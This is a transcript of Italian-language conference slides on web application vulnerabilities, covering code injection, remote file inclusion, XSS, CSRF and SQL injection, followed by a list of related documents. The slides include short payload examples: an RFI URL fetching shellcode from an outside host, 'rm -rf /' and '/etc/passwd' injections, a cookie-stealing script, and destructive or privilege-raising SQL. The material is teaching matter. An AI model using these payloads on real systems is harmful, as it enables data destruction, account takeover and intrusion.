Web Application (In)Security

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Web Application (In)Security"

Transcript

1 Web Application (In)Security UNCENSORED LUG Trieste Alessandro jekil Tanasi

2 Introduzione.. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ..no no, non esiste documentazione. Tanto è solo carta inutile!? Ma alla fine, ti dirò, la sicurezza non ci interessa al momento Ma certo che sono sicuro! Il sito è protetto da firewall e antivirus Anzi.. usiamo un ritrovato della sicurezza chiamato S..S.. SSL! Ci protegge lui, figo no? Affermazioni illustri di manager, aziende, enti non citati.

3 Un comune sito web Abbiamo provato, e abbiamo miseramente fallito. Questo ci insegna che non vale la pena di provare. Homer Simpson

4 Siti e applicazioni web Il web è un'insieme di servizi applicativi per la distribuzione di contenuti Negozi online, online banking, community, e-government Una web application prende un input dall'utente, esegue delle operazioni sull'input magari interagendo con componenti di terze parti, mostra in output un risultato in formato HTML Quasi sempre scritto from scratch Utilizzo di uno o più linguaggi di programmazione: PHP, Perl, Pyhton, ASP,.. Spesso le funzionalità sono l'unico obbiettivo, spesso il programmatore non ha nozioni di programmazione sicura

5 Architettura Architetture complesse Piattaforme multiple Molti protocolli Web Servers Application Server Database Server Presentation Layer Business Logic Media Store Content services Customer Identificatio n Access Controls Transaction Information Core Business Data

6 Un brutto giorno... Arriva il conto: Perdita di clienti Problemi legali Costi aggiuntivi Perdita di credibilità it d e r c M 40 ked c a h s d car rd party i h t t a Breach cessor o r p t n payme on Visa i l l i m 2 2 affects 14 million nd cards acards. r T writer Mas, t2e 8 PM ED senior 005: 3:1 /Money June 20 By Jean Britain warns of major e mail attack Hackers seen aiming at government, corporate networks The Associated Press Updated: 1:42 p.m. ET June 16, 2005 di, CNN ne Saha

7 Quali problemi? Sviluppo web fatto in maniera caotica Prima si devono soddisfare i requisiti dettati dall'utente/committente (features), poi se avanza tempo si mette in sicurezza Se una cosa funziona bene perchè modificarla? Falsi sensi di sicurezza (SSL, firewall) Mancanza di competenze degli sviluppatori, non comprensione dei problemi da parte del management, poca importanza data alla sicurezza. Indisponibilità a investire in cose che non danno un ritorno visibile.

8 Statistiche.. Source: 2006 CSI/FBI survey

9 Una nuova web era People that writes at the state of the art, make the world more secure. Sarah Gordon

10 Web 2.0

11 Web 2.0 Components Protocolli (SOAP, XML-RPC, REST over HTTP o HTTPS) Strutture dati (XML, JSON, JS objects) Metodi di comunicazione (asincrone, cross domain proxy) Condivisione di informazioni

12 Tecnologie 2.0 Architetture complesse Confusione creata dalle tante tecnologie usate RSS e molte sorgenti di dati non fidate Widgets e componenti di terze parti Condivisione delle informazioni Ma.. gli sviluppatori web sanno gestire tutto questo in modo sicuro?

13 Vulnerabilità comuni To win a war, one must know the way. Sun Tzu The Art of War

14 Utente, user input Gli utenti sono brave persone, di cui ci si può fidare, e che useranno l'applicazione nel modo corretto, tutti sono miei amici! L'applicazione non si aspetta input maliziosi, fiducia implicita nell'input E c'era la marmotta che incartava la cioccolata... L'input proveniente da un utente non è mai fidato L'obbiettivo è mettere l'applicazione in uno stato non previsto, per ottenere comportamenti anomali o informazioni di debugging

15 Globals Ad ogni parametro in input corrisponde una variabile, variabili globali Abilitate con il parametro register_globals (disabilitato di default da PHP 4.1.0) <?php fai_cose_con($pippo);?> Manipolazione di variabili (e conseguenze..)

16 Code injection Alcune funzioni (eval, exec, fopen, etc.) valutano codice o effettuano chiamate al sistema operativo <?php $name = $_GET['arg']; exec("echo $name");?> rm /etc/passwd Inietta codice (PHP script, comandi shell) Esecuzione di codice sul web server con i privilegi del web server

17 Remote file inclusion <?php include($layout);?> Esecuzione di codice remoto L'attaccante può far scaricare ed eseguire codice con i privilegi del web server semplicemente modificando l'url

18 Esempi Serendipity WordPress include(abspath. 'wp content/plugins/'. trim( $_GET['plugin'] )); 'include/db/db.inc.php'); include($_request['installdir']. '/Settings.php'); Squirellmail Plugin include($_post['include']);

19 Exploit Sensitive File retrieval Arbitrary code execution?value=http://www.hackme.com/shellcode.txt Content Removal?value=../../../../../../../../../etc/passwd shell_exec( nohup rm rf / 2>&1 1>/dev/null & ); Infinite possibilità d'uso...

20 Cross site scripting(xss) Fiducia implicita nel contenuto del browser Un sito fidato viene usato per distribuire contenuti malevoli Codice HTML e/o Javascript iniettato <?php echo You searched for $q ; // show results?>

21 XSS Privacy: Può trasmettere dati privati dell'utente, tracciamento, history Autenticazione: furto di credenziali, password manager Integrità: Può alterare il sito visitato, phishing Disponibilità: causare DoS Exploitation del browser e sue estensioni Rich Internet Applications (Flash, Acrobat, Java, ActiveX, Silverlight, Media Player) Scansione della intranet Attacchi alla intranet

22 Esempi phpmyadmin phpmyedit echo '<input type="hidden" name="fl" value="'.$_post[fl].'" />'."\n"; University of Toronto echo $_COOKIE['pma_db_filename_template']; <input type="hidden" name="show_courses" value="<?php echo $_GET['show_courses'];?>" /> Modernbill <form action="<?php echo $_SERVER['PHP_SELF'];?>" method="get">

23 Exploit Cookie/Session Theft Content Modification <script>document.getelementbyid( price ).inn erhtml= $1 ;</script> CSRF Initiation <script>window.location=...? document.cookie;</script> <img src= /> Social Engineering <iframe src= ></iframe>

24 CSRF Modello di autenticazione tradizionale: l'utente fa login e tutte le successive richieste sono autenticate Cross Site Request Forgery Forzare il browser a mandare richieste per un sito ad insaputa dell'utente (trasferimenti di denaro, post sul blog) <img src="http://google.com/search?q=porno"/> Utente forzato a fare una richiesta (autenticata) non voluta

25 SQL Injection Molti siti web usano un DBMS per gestire e memorizzare dati SQL è un linguaggio (DDL, DML, e altro..) <?php mysql_query( SELECT * FROM users WHERE uid='$var' );?> DELETE FROM users; Iniezione di query arbitrarie al DBMS, attacco al backend Amplificata da errate configurazioni dei DBMS

26 Esempi Bugs (bug tracking software) OSTicket "SELECT * FROM ticket_reps WHERE ID='$_POST[r_id]'" XOOPS "select * from userstable where uname='". $_COOKIE['FIDOlogin'][1]."'limit 1" "SELECT pass FROM {$table_prefix}users WHERE uname='$_cookie[$auth_ucookie]'" phpmyfaq "SELECT time FROM ".SQLPREFIX."faqsessions WHERE sid = ".$_REQUEST["id"]

27 Exploit Arbitrary Query Injection Arbitrary data retrieval?id=column_name Denial of Service?val=(DELETE FROM table);?val=(benchmark( , MD5(RAND())); Data Modification?val=(UPDATE users SET is_admin=1);

28 Autenticazione debole Gestione dell'autenticazione e della sessione Debolezze architetturali (Forgot my pass) Authentication bypass Session hijacking Brute forcing o previsione del session ID Cookie Overload / Session Fixation I cookie sono un'input utente e come tali vanno trattati

29 Errori di gestione Software installati e mai aggiornati Configurazioni errate, affrettate o di default Presenza di file non necessari, di backup, di esempio Permessi sbagliati, policy errate su dati privati Servizi non necessari abilitati, funziolità non utilizzate abilitate Account di default utilizzabili Debug abilitato

30 OWASP Top Cross Site Scripting (XSS) Injection Flaws Malicious File Execution Code vulnerable to remote file inclusion (RFI) Insecure Direct Object Reference Cross Site Request Forgery (CSRF) Information Leakage and Improper Error Handling Broken Authentication and Session Management Insecure Cryptographic Storage Insecure Communication Failure to Restrict URL Access

31 Ulteriori minacce We wouldn t need so much network security, if we didn t have such bad software security. Bruce Schneier

32 Web Services Standard per la comunicazione machine to machine (XML, SOAP, WSDL, UDDI) Interfaccia alla business logic e hai dati Automazione di processi di business (b2b, b2c), nuovi servizi Soffrono delle stesse problematiche delle applicazioni web: Messaggi di errori pettegoli SQL Injection Gestione delle eccezioni Access control Gestione delle sessioni Configurazioni errate

33 Malware Amministratori di siti che includono volutamente malware Siti defacciati che includono non volutamente malware Malware iniettato in aree pubbliche (XSS persistente) Click su link malformati in maniera apposita (XSS non persistente) Worm e virus dal mondo reale: Myspace.com 2005, Yamanner 2006

34 Altre vulnerabilità XML Security JJavascript manipulationson Security AJAX Security Buffer overflow Spam relay Timing Attacks ActiveX Controls Java applets (sandbox bypassing) Javascript manipulation Xpath Injection..e molto altro

35 Conclusioni Le applicazioni web sono quasi sempre scritte male o in fretta Quindi molto vulnerabili, principalmente a causa di problemi legati alla validazione dell'input o problemi architetturali Il codice delle web application fa parte del perimetro di sicurezza Le web application sono un bersaglio ghiotto La tecnologia cambia velocemente (JS, AJAX, WS), l'innovazione spesso non avviene in modo corretto

36 Slides Le slides di questa presentazione sono già disponibili su: Per informazioni: Non esitate a contattarmi anche solo per far due chiacchere...

37 Licenza Questo documento viene rilasciato sotto licenza Alcoolware, la quale non è altro che una normale licenza Creative Commons Attribute NonCommercial ShareALike [1] ma con l'aggiunta che se mi incontrate dobbiamo andare a bere qualcosa. In sintesi è liberamente distribuibile per usi non commerciali, copiabile e modificabile purchè citiate l'autore e la fonte. Se volete distribuire questo documento sul vostro sito siete pregati per favore di comunicarmelo in modo che possa spedirvi le nuove versioni. [1] nc sa/2.0/

38

Web Application (In)Security

Web Application (In)Security Web Application (In)Security Alessandro jekil Tanasi alessandro@tanasi.it http://www.tanasi.it LUG Trieste Introduzione.. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ..no

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011 IT Security Competence Center Web Application Security Tito Petronio SANS GCFA, GWAS Certified Professional 18 Febbraio 2011 Agenda Web Application Security OWASP Vulnerabilità delle Applicazioni Web Sicurezza

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Pattern Recognition and Applications Lab Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

Dott. Marcello Pistilli Business Development Manager. del software alla produzione:

Dott. Marcello Pistilli Business Development Manager. del software alla produzione: Direzione Tecnica /BU Sicurezza Dott. Marcello Pistilli Business Development Manager Ethical Hacking, dallo sviluppo del software alla produzione: Code review e Pen testing 07/05/2008 M300-5 FATTORE UMANO

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

Le problematiche di Web Application Security: la visione di ABI Lab. The OWASP Foundation http://www.owasp.org. Matteo Lucchetti

Le problematiche di Web Application Security: la visione di ABI Lab. The OWASP Foundation http://www.owasp.org. Matteo Lucchetti Le problematiche di Web Application Security: la visione di ABI Lab Matteo Lucchetti Senior Research Analyst ABI Lab OWASP-Day II Università La Sapienza, Roma 31st, March 2008 Copyright 2008 - The OWASP

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2010/2011 Sicurezza delle applicazioni web: attacchi web Alessandro Reina, Aristide Fattori 12 Maggio

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: attacchi web Alessandro Reina Aristide Fattori

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

Laboratorio di reti II: Problematiche di sicurezza delle reti

Laboratorio di reti II: Problematiche di sicurezza delle reti Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi brocchi@dsi.unifi.it 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, 2008 1 / 43 La sicurezza

Dettagli

Indice generale. Parte I Anatomia del Web...21. Introduzione...xiii

Indice generale. Parte I Anatomia del Web...21. Introduzione...xiii Indice generale Introduzione...xiii Capitolo 1 La sicurezza nel mondo delle applicazioni web...1 La sicurezza delle informazioni in sintesi... 1 Primi approcci con le soluzioni formali... 2 Introduzione

Dettagli

Alessandro Tanasi. alessandro@tanasi.it. http://www.tanasi.it. Alessandro Tanasi alessandro@tanasi.it. La sicurezza informatica nelle aziende

Alessandro Tanasi. alessandro@tanasi.it. http://www.tanasi.it. Alessandro Tanasi alessandro@tanasi.it. La sicurezza informatica nelle aziende La sicurezza informatica nelle aziende Alessandro Tanasi alessandro@tanasi.it http://www.tanasi.it 1 Introduzione società dipendente dalla tecnologia definizione di sicurezza informatica gli obbiettivi

Dettagli

Attacchi Web. Davide Marrone

Attacchi Web. Davide Marrone <davide@security.dico.unimi.it> Davide Marrone davide@security.dico.unimi.it Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento di Informatica e Comunicazione 22 gennaio 2007 Sommario Classificazione

Dettagli

Applicazioni software e gestione delle vulnerabilità: un caso concreto di successo

Applicazioni software e gestione delle vulnerabilità: un caso concreto di successo Applicazioni software e gestione delle vulnerabilità: un caso concreto di successo Roberto Obialero, GCFW, GCFA Fabio Bucciarelli, GCFA, CEH Agenda Analisi del contesto (attacchi,

Dettagli

Concetti base. Impianti Informatici. Web application

Concetti base. Impianti Informatici. Web application Concetti base Web application La diffusione del World Wide Web 2 Supporto ai ricercatori Organizzazione documentazione Condivisione informazioni Scambio di informazioni di qualsiasi natura Chat Forum Intranet

Dettagli

Sicurezza delle applicazioni web

Sicurezza delle applicazioni web Sicurezza delle applicazioni web (Programmazione sicura in ambiente web) Luca Carettoni l.carettoni@securenetwork.it 26 Novembre Linux Day 2005 2005 Secure Network S.r.l. Il peggiore dei mondi... Un server

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza 1 HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Internet Banking e Web Security

Internet Banking e Web Security Internet Banking e Web Security Giorgio Fedon Chief Operation Officer Minded Security S.r.l. OWASP-Day II Università La Sapienza, Roma 31st, March 2008 giorgio.fedon@mindedsecurity.com Copyright 2008 -

Dettagli

- Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam?

- Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam? Perché questo corso - Oggi si sente sempre più spesso parlare di malware e virus. - Cosa sono? - Perché difendersi? - Cosa è lo spam? Cosa spiegheremo - protocolli e le tecnologie internet - quali sono

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

Simone Riccetti. Applicazioni web:security by design

Simone Riccetti. Applicazioni web:security by design Simone Riccetti Applicazioni web:security by design Perchè il problema continua a crescere? Connettività: Internet L incremento del numero e delle tipologie d vettori di attacco è proporzionale all incremento

Dettagli

Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web. Problemi di sicurezza nello sviluppo di applicazioni web

Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web. Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

Problemi di sicurezza nello sviluppo di applicazioni web. Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web

Problemi di sicurezza nello sviluppo di applicazioni web. Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

Problemi di sicurezza nello sviluppo di applicazioni web

Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

Sicurezza informatica: Nozioni di base Come proteggere il proprio computer Suggerimenti e linee guida

Sicurezza informatica: Nozioni di base Come proteggere il proprio computer Suggerimenti e linee guida Carlo Carlesi Istituto di Scienza e Tecnologie dell'informazione A. Faedo 1 Sicurezza informatica: Nozioni di base Come proteggere il proprio computer Suggerimenti e linee guida Le minacce della rete 2

Dettagli

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP Indice Capitolo 1 I rischi: introduzione alle reti connesse a Internet 1 1.1 Il virus Worm 3 1.2 Lo stato della rete nel 2002 9 1.3 Cos è Internet 10 1.4 La commutazione di pacchetti: la base della maggior

Dettagli

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER L architettura CLIENT SERVER è l architettura standard dei sistemi di rete, dove i computer detti SERVER forniscono servizi, e computer detti CLIENT, richiedono

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli

Progettazione di Sistemi Interattivi. Gli strati e la rete. Struttura e supporti all implementazione di applicazioni in rete (cenni)

Progettazione di Sistemi Interattivi. Gli strati e la rete. Struttura e supporti all implementazione di applicazioni in rete (cenni) Progettazione di Sistemi Interattivi Struttura e supporti all implementazione di applicazioni in rete (cenni) Docente: Daniela Fogli Gli strati e la rete Stratificazione da un altro punto di vista: i calcolatori

Dettagli

Tecnologia avanzata e project engineering al servizio della PA Sicurezza delle reti della PA, dei servizi pubblici e delle attività digitali degli impiegati pubblici FORUM PA Digital Security per la PA

Dettagli

Sicurezza: credenziali, protocolli sicuri, virus, backup

Sicurezza: credenziali, protocolli sicuri, virus, backup Sicurezza: credenziali, protocolli sicuri, virus, backup La sicurezza informatica Il tema della sicurezza informatica riguarda tutte le componenti del sistema informatico: l hardware, il software, i dati,

Dettagli

La sicurezza secondo skymeeting (data pubblicazione 06/12/2011)

La sicurezza secondo skymeeting (data pubblicazione 06/12/2011) La sicurezza secondo skymeeting (data pubblicazione 06/12/2011) www.skymeeting.net La sicurezza nel sistema di videoconferenza Skymeeting skymeeting è un sistema di videoconferenza web-based che utilizza

Dettagli

PHP Secure Programming

PHP Secure Programming PHP Secure Programming Seminario sviluppato nell'ambito del corso di Sicurezza, Dipartimento di Informatica e Scienze dell'informazione (DISI), Genova Autore: Matteo Greco

Dettagli

Primi risultati della Risk Analysis tecnica e proposta di attività per la fase successiva di Vulnerability Assessment

Primi risultati della Risk Analysis tecnica e proposta di attività per la fase successiva di Vulnerability Assessment TSF S.p.A. 00155 Roma Via V. G. Galati 71 Tel. +39 06 43621 www.tsf.it Società soggetta all attività di Direzione e Coordinamento di AlmavivA S.p.A. Analisi di sicurezza della postazione PIC operativa

Dettagli

Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1)

Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Chiara Braghin chiara.braghin@unimi.it Le 2 maggiori vulnerabilità dei siti Web SQL Injection Il browser spedisce dell input

Dettagli

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro?

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? Che cos'e' SQL? Acronimo di 'Structured Query Language E' un linguaggio

Dettagli

Servizi centralizzati v1.2 (20/12/05)

Servizi centralizzati v1.2 (20/12/05) Servizi centralizzati v1.2 (20/12/05) 1. Premessa Anche se il documento è strutturato come un ricettario, va tenuto presente che l argomento trattato, vista la sua variabilità, non è facilmente organizzabile

Dettagli

UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica. Simona Ullo

UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica. Simona Ullo UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Simona Ullo ATTACCHI ALLE APPLICAZIONI WEB: SQL INJECTION E CROSS SITE SCRIPTING (XSS) Tesina di Sicurezza

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

Navigazione Consapevole. Conoscere il lato oscuro di Internet

Navigazione Consapevole. Conoscere il lato oscuro di Internet Navigazione Consapevole Conoscere il lato oscuro di Internet Intro Browsing e ricerche Privacy e sicurezza (password sicure / chiavi elettroniche) Usare la posta elettronica Difendersi dalle minacce online

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013 Sicurezza delle applicazioni web: attacchi web Srdjan Matic, Aristide Fattori 31 Maggio 2013

Dettagli

La Sicurezza della Piattaforma Macromedia Flash : le Soluzioni Aziendali di Macromedia

La Sicurezza della Piattaforma Macromedia Flash : le Soluzioni Aziendali di Macromedia WHITE PAPER La Sicurezza della Piattaforma Macromedia Flash : le Soluzioni Aziendali di Macromedia Adrian Ludwig Settembre 2005 Copyright 2005 Macromedia, Inc.Tutti i diritti riservati. Le informazioni

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia Claudio De Paoli IT Security Practice Manager Un approccio innovativo alla sicurezza degli accessi ai servizi di ebanking Roma, gennaio 2011 Cybercrime: Costante aumento di Incidenti e frodi Il mercato

Dettagli

Cookie (1) - Componenti

Cookie (1) - Componenti Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Vulnerabilità informatiche (semplici)..

Vulnerabilità informatiche (semplici).. Vulnerabilità informatiche (semplici).. in infrastrutture complesse....il contenuto di questo speech è di pura fantasia, ogni riferimento a infrastrutture reali o fatti realmente accaduti è puramente casuale

Dettagli

$whois. Introduzione Attacco a una webapp Attacco a un sistema Conclusioni. http://voidsec.com voidsec@voidsec.com

$whois. Introduzione Attacco a una webapp Attacco a un sistema Conclusioni. http://voidsec.com voidsec@voidsec.com $whois Paolo Stagno Luca Poletti http://voidsec.com voidsec@voidsec.com Nell anno 2013: Aumento del 30% degli attacchi a siti e web application 14 zero-day 5,291 nuove vulnerabilità scoperte, 415 di queste

Dettagli

Flavio De Paoli depaoli@disco.unimib.it

Flavio De Paoli depaoli@disco.unimib.it Flavio De Paoli depaoli@disco.unimib.it 1 Il web come architettura di riferimento Architettura di una applicazione web Tecnologie lato server: Script (PHP, Pyton, Perl), Servlet/JSP, ASP Tecnologie lato

Dettagli

OWASP Web Application Penetration Checklist. Versione 1.1

OWASP Web Application Penetration Checklist. Versione 1.1 Versione 1.1 14 Luglio 2004 Questo documento è rilasciato sotto la licenza GNU, e il copyright è proprietà della Fondazione OWASP. Siete pregati di leggere e comprendere le condizioni contenute in tale

Dettagli

Corso di Informatica Modulo T3 B1 Programmazione web

Corso di Informatica Modulo T3 B1 Programmazione web Corso di Informatica Modulo T3 B1 Programmazione web 1 Prerequisiti Architettura client/server Elementi del linguaggio HTML web server SQL server Concetti generali sulle basi di dati 2 1 Introduzione Lo

Dettagli

DIVISIONE DATA & NETWORK SECURITY

DIVISIONE DATA & NETWORK SECURITY DIVISIONE DATA & NETWORK SECURITY www.pp-sicurezzainformatica.it FEDERAZIONE ITALIANA ISTITUTI INVESTIGAZIONI - INFORMAZIONI - SICUREZZA ASSOCIATO: FEDERPOL Divisione Data & Network Security www.pp-sicurezzainformatica.it

Dettagli

Tecnologie e Programmazione Web

Tecnologie e Programmazione Web Presentazione 1 Tecnologie e Programmazione Web Html, JavaScript e PHP RgLUG Ragusa Linux Users Group SOftware LIbero RAgusa http://www.solira.org - Nunzio Brugaletta (ennebi) - Reti 2 Scopi di una rete

Dettagli

Come funziona il WWW. Architettura client-server. Web: client-server. Il protocollo

Come funziona il WWW. Architettura client-server. Web: client-server. Il protocollo Come funziona il WWW Il funzionamento del World Wide Web non differisce molto da quello delle altre applicazioni Internet Anche in questo caso il sistema si basa su una interazione tra un computer client

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

vulnerabilità del software

vulnerabilità del software vulnerabilità del software 1 quando il software non si comporta correttamente. input precondizioni elaborazione postcondizioni output un programma è corretto quando su qualsiasi input che soddisfa le precondizioni

Dettagli

Elementi di Sicurezza e Privatezza Lezione 16 Web Security - Code Injection (2)

Elementi di Sicurezza e Privatezza Lezione 16 Web Security - Code Injection (2) Elementi di Sicurezza e Privatezza Lezione 16 Web Security - Code Injection (2) Chiara Braghin chiara.braghin@unimi.it XSS Cross Site Scripting Cosa è XSS? (1) Forma di attacco in cui l attaccante è in

Dettagli

KLEIS A.I. SECURITY SUITE

KLEIS A.I. SECURITY SUITE KLEIS A.I. SECURITY SUITE Protezione dei servizi non web Kleis A.I. SecureMail, Kleis A.I. SecureEmulation, Kleis A.I. SecureXEmulation, Kleis A.I. SecureTransfer, Kleis A.I. SecureShare www.kwaf.it Protezione

Dettagli

MEGA Advisor Architecture Overview MEGA 2009 SP5

MEGA Advisor Architecture Overview MEGA 2009 SP5 Revisione: August 22, 2012 Creazione: March 31, 2010 Autore: Jérôme Horber Contenuto Riepilogo Il documento descrive i requisiti sistema e le architetture di implementazione possibili per MEGA Advisor.

Dettagli

